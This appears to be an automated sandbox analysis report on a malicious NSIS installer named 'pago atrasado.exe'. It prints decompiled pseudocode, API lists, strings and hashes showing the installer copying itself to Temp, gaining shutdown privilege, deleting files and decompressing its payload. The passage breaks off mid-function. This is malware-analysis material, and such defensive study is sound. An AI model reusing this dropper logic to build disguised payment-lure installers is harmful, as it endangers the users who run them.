                                            											__eflags =  *0x423fd4; // 0x0
                                            											if(__eflags == 0) {
                                            												L64:
                                            												_t64 =  *0x423fec; // 0xffffffff
                                            												__eflags = _t64 - 0xffffffff;
                                            												if(_t64 != 0xffffffff) {
                                            													 *(_t129 + 0x1c) = _t64;
                                            												}
                                            												ExitProcess( *(_t129 + 0x1c));
                                            											}
                                            											_t126 = E00405F28(5);
                                            											_t119 = E00405F28(6);
                                            											_t67 = E00405F28(7);
                                            											__eflags = _t126;
                                            											_t117 = _t67;
                                            											if(_t126 != 0) {
                                            												__eflags = _t119;
                                            												if(_t119 != 0) {
                                            													__eflags = _t117;
                                            													if(_t117 != 0) {
                                            														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
                                            														__eflags = _t74;
                                            														if(_t74 != 0) {
                                            															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
                                            															 *(_t129 + 0x3c) = 1;
                                            															 *(_t129 + 0x48) = 2;
                                            															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
                                            														}
                                            													}
                                            												}
                                            											}
                                            											_t68 = E00405F28(8);
                                            											__eflags = _t68;
                                            											if(_t68 == 0) {
                                            												L62:
                                            												_t69 = ExitWindowsEx(2, 0x80040002);
                                            												__eflags = _t69;
                                            												if(_t69 != 0) {
                                            													goto L64;
                                            												}
                                            												goto L63;
                                            											} else {
                                            												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
                                            												__eflags = _t71;
                                            												if(_t71 == 0) {
                                            													L63:
                                            													E0040140B(9);
                                            													goto L64;
                                            												}
                                            												goto L62;
                                            											}
                                            										}
                                            										E00405459( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
                                            										ExitProcess(2);
                                            									}
                                            									_t138 =  *0x423f5c; // 0x0
                                            									if(_t138 == 0) {
                                            										L36:
                                            										 *0x423fec =  *0x423fec | 0xffffffff;
                                            										 *(_t129 + 0x1c) = E004035EB( *0x423fec);
                                            										goto L37;
                                            									}
                                            									_t123 = E004056B6(_t125, 0);
                                            									while(_t123 >= _t125) {
                                            										__eflags =  *_t123 - 0x3d3f5f20;
                                            										if(__eflags == 0) {
                                            											break;
                                            										}
                                            										_t123 = _t123 - 1;
                                            										__eflags = _t123;
                                            									}
                                            									_t140 = _t123 - _t125;
                                            									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
                                            									if(_t123 < _t125) {
                                            										_t121 = E004053E0(_t143);
                                            										lstrcatA(_t116, "~nsu");
                                            										if(_t121 != 0) {
                                            											lstrcatA(_t116, "A");
                                            										}
                                            										lstrcatA(_t116, ".tmp");
                                            										_t127 = "C:\\Users\\alfons\\Desktop";
                                            										if(lstrcmpiA(_t116, "C:\\Users\\alfons\\Desktop") != 0) {
                                            											_push(_t116);
                                            											if(_t121 == 0) {
                                            												E004053C3();
                                            											} else {
                                            												E00405346();
                                            											}
                                            											SetCurrentDirectoryA(_t116);
                                            											_t147 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
                                            											if(_t147 == 0) {
                                            												E00405B98("C:\\Users\\alfons\\AppData\\Local\\Temp", _t127);
                                            											}
                                            											E00405B98(0x425000,  *(_t129 + 0x20));
                                            											 *0x425400 = 0x41;
                                            											_t128 = 0x1a;
                                            											do {
                                            												_t87 =  *0x423f50; // 0x661638
                                            												E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)(_t87 + 0x120)));
                                            												DeleteFileA(0x41f0f0);
                                            												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
                                            													_t91 = CopyFileA("C:\\Users\\alfons\\Desktop\\pago atrasado.exe", 0x41f0f0, 1);
                                            													_t149 = _t91;
                                            													if(_t91 != 0) {
                                            														_push(0);
                                            														_push(0x41f0f0);
                                            														E004058E6(_t149);
                                            														_t93 =  *0x423f50; // 0x661638
                                            														E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)(_t93 + 0x124)));
                                            														_t95 = E004053F8(0x41f0f0);
                                            														if(_t95 != 0) {
                                            															CloseHandle(_t95);
                                            															 *((intOrPtr*)(_t129 + 0x10)) = 0;
                                            														}
                                            													}
                                            												}
                                            												 *0x425400 =  *0x425400 + 1;
                                            												_t128 = _t128 - 1;
                                            												_t151 = _t128;
                                            											} while (_t128 != 0);
                                            											_push(0);
                                            											_push(_t116);
                                            											E004058E6(_t151);
                                            										}
                                            										goto L37;
                                            									}
                                            									 *_t123 = 0;
                                            									_t124 =  &(_t123[4]);
                                            									if(E0040576C(_t140,  &(_t123[4])) == 0) {
                                            										goto L37;
                                            									}
                                            									E00405B98("C:\\Users\\alfons\\AppData\\Local\\Temp", _t124);
                                            									E00405B98("C:\\Users\\alfons\\AppData\\Local\\Temp", _t124);
                                            									 *((intOrPtr*)(_t129 + 0x10)) = 0;
                                            									goto L36;
                                            								}
                                            								GetWindowsDirectoryA(_t116, 0x3fb);
                                            								lstrcatA(_t116, "\\Temp");
                                            								_t107 = E004030CA(_t135);
                                            								_t136 = _t107;
                                            								if(_t107 == 0) {
                                            									goto L37;
                                            								}
                                            								goto L27;
                                            							} else {
                                            								goto L20;
                                            							}
                                            						}
                                            					} else {
                                            						goto L9;
                                            					}
                                            					do {
                                            						L9:
                                            						_t56 =  &(_t56[1]);
                                            						__eflags =  *_t56 - 0x20;
                                            					} while ( *_t56 == 0x20);
                                            					goto L10;
                                            				}
                                            				goto L25;
                                            				L4:
                                            				E00405EBA(_t118); // executed
                                            				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
                                            				if( *_t118 != 0) {
                                            					goto L4;
                                            				} else {
                                            					E00405F28(0xd);
                                            					_t47 = E00405F28(0xb);
                                            					 *0x423f44 = _t47;
                                            					__imp__#17();
                                            					__imp__OleInitialize(0); // executed
                                            					 *0x423ff8 = _t47;
                                            					SHGetFileInfoA(0x41f4f0, 0, _t129 + 0x38, 0x160, 0); // executed
                                            					E00405B98("cuflzcqvvfgho Setup", "NSIS Error");
                                            					_t51 = GetCommandLineA();
                                            					_t125 = "\"C:\\Users\\alfons\\Desktop\\pago atrasado.exe\" ";
                                            					E00405B98(_t125, _t51);
                                            					 *0x423f40 = GetModuleHandleA(0);
                                            					_t54 = _t125;
                                            					if("\"C:\\Users\\alfons\\Desktop\\pago atrasado.exe\" " == 0x22) {
                                            						 *((char*)(_t129 + 0x14)) = 0x22;
                                            						_t54 =  &M0042A001;
                                            					}
                                            					_t56 = CharNextA(E004056B6(_t54,  *((intOrPtr*)(_t129 + 0x14))));
                                            					 *(_t129 + 0x20) = _t56;
                                            					goto L22;
                                            				}
                                            			}



































                                            APIs
                                            • SetErrorMode.KERNEL32 ref: 00403121
                                            • GetVersion.KERNEL32 ref: 00403127
                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403150
                                            • #17.COMCTL32(0000000B,0000000D), ref: 00403171
                                            • OleInitialize.OLE32(00000000), ref: 00403178
                                            • SHGetFileInfoA.SHELL32(0041F4F0,00000000,?,00000160,00000000), ref: 00403194
                                            • GetCommandLineA.KERNEL32(cuflzcqvvfgho Setup,NSIS Error), ref: 004031A9
                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\pago atrasado.exe" ,00000000), ref: 004031BC
                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\pago atrasado.exe" ,00409168), ref: 004031E7
                                            • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040327E
                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403293
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040329F
                                            • DeleteFileA.KERNEL32(1033), ref: 004032B6
                                              • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                              • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                            • OleUninitialize.OLE32(00000020), ref: 00403337
                                            • ExitProcess.KERNEL32 ref: 00403357
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\pago atrasado.exe" ,00000000,00000020), ref: 0040336A
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\pago atrasado.exe" ,00000000,00000020), ref: 00403379
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\pago atrasado.exe" ,00000000,00000020), ref: 00403384
                                            • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\pago atrasado.exe" ,00000000,00000020), ref: 00403390
                                            • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033AC
                                            • DeleteFileA.KERNEL32(0041F0F0,0041F0F0,?,00425000,?), ref: 004033F6
                                            • CopyFileA.KERNEL32(C:\Users\user\Desktop\pago atrasado.exe,0041F0F0,00000001), ref: 0040340A
                                            • CloseHandle.KERNEL32(00000000,0041F0F0,0041F0F0,?,0041F0F0,00000000), ref: 00403437
                                            • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 00403490
                                            • ExitWindowsEx.USER32 ref: 004034E8
                                            • ExitProcess.KERNEL32 ref: 0040350B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                            • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\pago atrasado.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\pago atrasado.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$cuflzcqvvfgho Setup$~nsu
                                            • API String ID: 3469842172-2681257831
                                            • Opcode ID: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                                            • Instruction ID: 90ec7ab760c3480979c70ff1213755fd4c015a14bcf9795d8db5e914811e335b
                                            • Opcode Fuzzy Hash: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                                            • Instruction Fuzzy Hash: E5A10470A083016BE7216F619C4AB2B7EACEB0170AF40457FF544B61D2C77CAA458B6F
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 98%
                                            			E004054BD(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				struct _WIN32_FIND_DATAA _v332;
                                            				signed int _t37;
                                            				char* _t49;
                                            				signed int _t52;
                                            				signed int _t55;
                                            				signed int _t61;
                                            				signed int _t63;
                                            				void* _t65;
                                            				signed int _t68;
                                            				CHAR* _t70;
                                            				CHAR* _t72;
                                            				char* _t75;
                                            
                                            				_t72 = _a4;
                                            				_t37 = E0040576C(__eflags, _t72);
                                            				_v12 = _t37;
                                            				if((_a8 & 0x00000008) != 0) {
                                            					_t63 = DeleteFileA(_t72); // executed
                                            					asm("sbb eax, eax");
                                            					_t65 =  ~_t63 + 1;
                                            					 *0x423fc8 =  *0x423fc8 + _t65;
                                            					return _t65;
                                            				}
                                            				_t68 = _a8 & 0x00000001;
                                            				__eflags = _t68;
                                            				_v8 = _t68;
                                            				if(_t68 == 0) {
                                            					L5:
                                            					E00405B98(0x421540, _t72);
                                            					__eflags = _t68;
                                            					if(_t68 == 0) {
                                            						E004056D2(_t72);
                                            					} else {
                                            						lstrcatA(0x421540, "\*.*");
                                            					}
                                            					__eflags =  *_t72;
                                            					if( *_t72 != 0) {
                                            						L10:
                                            						lstrcatA(_t72, 0x409010);
                                            						L11:
                                            						_t70 =  &(_t72[lstrlenA(_t72)]);
                                            						_t37 = FindFirstFileA(0x421540,  &_v332);
                                            						__eflags = _t37 - 0xffffffff;
                                            						_a4 = _t37;
                                            						if(_t37 == 0xffffffff) {
                                            							L29:
                                            							__eflags = _v8;
                                            							if(_v8 != 0) {
                                            								_t31 = _t70 - 1;
                                            								 *_t31 =  *(_t70 - 1) & 0x00000000;
                                            								__eflags =  *_t31;
                                            							}
                                            							goto L31;
                                            						} else {
                                            							goto L12;
                                            						}
                                            						do {
                                            							L12:
                                            							_t75 =  &(_v332.cFileName);
                                            							_t49 = E004056B6( &(_v332.cFileName), 0x3f);
                                            							__eflags =  *_t49;
                                            							if( *_t49 != 0) {
                                            								__eflags = _v332.cAlternateFileName;
                                            								if(_v332.cAlternateFileName != 0) {
                                            									_t75 =  &(_v332.cAlternateFileName);
                                            								}
                                            							}
                                            							__eflags =  *_t75 - 0x2e;
                                            							if( *_t75 != 0x2e) {
                                            								L19:
                                            								E00405B98(_t70, _t75);
                                            								__eflags = _v332.dwFileAttributes & 0x00000010;
                                            								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                                            									E00405850(_t72);
                                            									_t52 = DeleteFileA(_t72);
                                            									__eflags = _t52;
                                            									if(_t52 != 0) {
                                            										E00404E84(0xfffffff2, _t72);
                                            									} else {
                                            										__eflags = _a8 & 0x00000004;
                                            										if((_a8 & 0x00000004) == 0) {
                                            											 *0x423fc8 =  *0x423fc8 + 1;
                                            										} else {
                                            											E00404E84(0xfffffff1, _t72);
                                            											E004058E6(__eflags, _t72, 0);
                                            										}
                                            									}
                                            								} else {
                                            									__eflags = (_a8 & 0x00000003) - 3;
                                            									if(__eflags == 0) {
                                            										E004054BD(_t70, __eflags, _t72, _a8);
                                            									}
                                            								}
                                            								goto L27;
                                            							}
                                            							_t61 =  *((intOrPtr*)(_t75 + 1));
                                            							__eflags = _t61;
                                            							if(_t61 == 0) {
                                            								goto L27;
                                            							}
                                            							__eflags = _t61 - 0x2e;
                                            							if(_t61 != 0x2e) {
                                            								goto L19;
                                            							}
                                            							__eflags =  *((char*)(_t75 + 2));
                                            							if( *((char*)(_t75 + 2)) == 0) {
                                            								goto L27;
                                            							}
                                            							goto L19;
                                            							L27:
                                            							_t55 = FindNextFileA(_a4,  &_v332);
                                            							__eflags = _t55;
                                            						} while (_t55 != 0);
                                            						_t37 = FindClose(_a4);
                                            						goto L29;
                                            					}
                                            					__eflags =  *0x421540 - 0x5c;
                                            					if( *0x421540 != 0x5c) {
                                            						goto L11;
                                            					}
                                            					goto L10;
                                            				} else {
                                            					__eflags = _t37;
                                            					if(_t37 == 0) {
                                            						L31:
                                            						__eflags = _v8;
                                            						if(_v8 == 0) {
                                            							L39:
                                            							return _t37;
                                            						}
                                            						__eflags = _v12;
                                            						if(_v12 != 0) {
                                            							_t37 = E00405E93(_t72);
                                            							__eflags = _t37;
                                            							if(_t37 == 0) {
                                            								goto L39;
                                            							}
                                            							E0040568B(_t72);
                                            							E00405850(_t72);
                                            							_t37 = RemoveDirectoryA(_t72);
                                            							__eflags = _t37;
                                            							if(_t37 != 0) {
                                            								return E00404E84(0xffffffe5, _t72);
                                            							}
                                            							__eflags = _a8 & 0x00000004;
                                            							if((_a8 & 0x00000004) == 0) {
                                            								goto L33;
                                            							}
                                            							E00404E84(0xfffffff1, _t72);
                                            							return E004058E6(__eflags, _t72, 0);
                                            						}
                                            						L33:
                                            						 *0x423fc8 =  *0x423fc8 + 1;
                                            						return _t37;
                                            					}
                                            					__eflags = _a8 & 0x00000002;
                                            					if((_a8 & 0x00000002) == 0) {
                                            						goto L31;
                                            					}
                                            					goto L5;
                                            				}
                                            			}

                                            APIs
                                            • DeleteFileA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004054DB
                                            • lstrcatA.KERNEL32(00421540,\*.*,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405525
                                            • lstrcatA.KERNEL32(?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405546
                                            • lstrlenA.KERNEL32(?,?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040554C
                                            • FindFirstFileA.KERNEL32(00421540,?,?,?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040555D
                                            • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040560F
                                            • FindClose.KERNEL32(?), ref: 00405620
                                            Strings
                                            • \*.*, xrefs: 0040551F
                                            • "C:\Users\user\Desktop\pago atrasado.exe" , xrefs: 004054BD
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004054C7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: "C:\Users\user\Desktop\pago atrasado.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                            • API String ID: 2035342205-2095690587
                                            • Opcode ID: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                                            • Instruction ID: 6fea787f5ff7f663b03802bfccf250d7b0f6b6b9ddff8139893414afbc0e0c0d
                                            • Opcode Fuzzy Hash: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                                            • Instruction Fuzzy Hash: D851CE30804A447ACB216B218C49BBF3B78DF92728F54857BF809751D2E73D5982DE5E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1001A4DC
                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 1001A506
                                            • ReadFile.KERNEL32(00000000,00000000,1001A248,?,00000000), ref: 1001A51D
                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 1001A53F
                                            • FindCloseChangeNotification.KERNEL32(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,1001A19C,7FDFFF66), ref: 1001A5B2
                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 1001A5BD
                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,1001A19C), ref: 1001A608
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                            • String ID:
                                            • API String ID: 656311269-0
                                            • Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                            • Instruction ID: 08dd0d8a1b5c369709eae3767430104e5388ea3a98c6ad7ed95ce82a3af55b79
                                            • Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                            • Instruction Fuzzy Hash: 1F616175E04714ABCB10CFB4C884BAEB7F6EF49650F108059E905EB395E674EE818B54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 98%
                                            			E004061D4() {
                                            				unsigned short _t531;
                                            				signed int _t532;
                                            				void _t533;
                                            				void* _t534;
                                            				signed int _t535;
                                            				signed int _t565;
                                            				signed int _t568;
                                            				signed int _t590;
                                            				signed int* _t607;
                                            				void* _t614;
                                            
                                            				L0:
                                            				while(1) {
                                            					L0:
                                            					if( *(_t614 - 0x40) != 0) {
                                            						 *(_t614 - 0x34) = 1;
                                            						 *(_t614 - 0x84) = 7;
                                            						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                            						L132:
                                            						 *(_t614 - 0x54) = _t607;
                                            						L133:
                                            						_t531 =  *_t607;
                                            						_t590 = _t531 & 0x0000ffff;
                                            						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                            						if( *(_t614 - 0xc) >= _t565) {
                                            							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                            							 *(_t614 - 0x40) = 1;
                                            							_t532 = _t531 - (_t531 >> 5);
                                            							 *_t607 = _t532;
                                            						} else {
                                            							 *(_t614 - 0x10) = _t565;
                                            							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                            							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                            						}
                                            						if( *(_t614 - 0x10) >= 0x1000000) {
                                            							L139:
                                            							_t533 =  *(_t614 - 0x84);
                                            							L140:
                                            							 *(_t614 - 0x88) = _t533;
                                            							goto L1;
                                            						} else {
                                            							L137:
                                            							if( *(_t614 - 0x6c) == 0) {
                                            								 *(_t614 - 0x88) = 5;
                                            								goto L170;
                                            							}
                                            							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                            							goto L139;
                                            						}
                                            					} else {
                                            						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                            						__esi =  *(__ebp - 0x60);
                                            						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                            						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                            						__ecx =  *(__ebp - 0x3c);
                                            						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                            						__ecx =  *(__ebp - 4);
                                            						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                            						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                            						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            						if( *(__ebp - 0x38) >= 4) {
                                            							if( *(__ebp - 0x38) >= 0xa) {
                                            								_t97 = __ebp - 0x38;
                                            								 *_t97 =  *(__ebp - 0x38) - 6;
                                            							} else {
                                            								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                            							}
                                            						} else {
                                            							 *(__ebp - 0x38) = 0;
                                            						}
                                            						if( *(__ebp - 0x34) == __edx) {
                                            							__ebx = 0;
                                            							__ebx = 1;
                                            							L60:
                                            							__eax =  *(__ebp - 0x58);
                                            							__edx = __ebx + __ebx;
                                            							__ecx =  *(__ebp - 0x10);
                                            							__esi = __edx + __eax;
                                            							__ecx =  *(__ebp - 0x10) >> 0xb;
                                            							__ax =  *__esi;
                                            							 *(__ebp - 0x54) = __esi;
                                            							__edi = __ax & 0x0000ffff;
                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            							if( *(__ebp - 0xc) >= __ecx) {
                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            								__cx = __ax;
                                            								_t216 = __edx + 1; // 0x1
                                            								__ebx = _t216;
                                            								__cx = __ax >> 5;
                                            								 *__esi = __ax;
                                            							} else {
                                            								 *(__ebp - 0x10) = __ecx;
                                            								0x800 = 0x800 - __edi;
                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            								__ebx = __ebx + __ebx;
                                            								 *__esi = __cx;
                                            							}
                                            							 *(__ebp - 0x44) = __ebx;
                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                            								L59:
                                            								if(__ebx >= 0x100) {
                                            									goto L54;
                                            								}
                                            								goto L60;
                                            							} else {
                                            								L57:
                                            								if( *(__ebp - 0x6c) == 0) {
                                            									 *(__ebp - 0x88) = 0xf;
                                            									goto L170;
                                            								}
                                            								__ecx =  *(__ebp - 0x70);
                                            								__eax =  *(__ebp - 0xc);
                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            								_t202 = __ebp - 0x70;
                                            								 *_t202 =  *(__ebp - 0x70) + 1;
                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            								goto L59;
                                            							}
                                            						} else {
                                            							__eax =  *(__ebp - 0x14);
                                            							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            							if(__eax >=  *(__ebp - 0x74)) {
                                            								__eax = __eax +  *(__ebp - 0x74);
                                            							}
                                            							__ecx =  *(__ebp - 8);
                                            							__ebx = 0;
                                            							__ebx = 1;
                                            							__al =  *((intOrPtr*)(__eax + __ecx));
                                            							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                            							L40:
                                            							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                            							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                            							__ecx =  *(__ebp - 0x58);
                                            							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                            							 *(__ebp - 0x48) = __eax;
                                            							__eax = __eax + 1;
                                            							__eax = __eax << 8;
                                            							__eax = __eax + __ebx;
                                            							__esi =  *(__ebp - 0x58) + __eax * 2;
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            							__ax =  *__esi;
                                            							 *(__ebp - 0x54) = __esi;
                                            							__edx = __ax & 0x0000ffff;
                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                            							if( *(__ebp - 0xc) >= __ecx) {
                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            								__cx = __ax;
                                            								 *(__ebp - 0x40) = 1;
                                            								__cx = __ax >> 5;
                                            								__ebx = __ebx + __ebx + 1;
                                            								 *__esi = __ax;
                                            							} else {
                                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                            								 *(__ebp - 0x10) = __ecx;
                                            								0x800 = 0x800 - __edx;
                                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                            								__ebx = __ebx + __ebx;
                                            								 *__esi = __cx;
                                            							}
                                            							 *(__ebp - 0x44) = __ebx;
                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                            								L38:
                                            								__eax =  *(__ebp - 0x40);
                                            								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                            									while(1) {
                                            										if(__ebx >= 0x100) {
                                            											break;
                                            										}
                                            										__eax =  *(__ebp - 0x58);
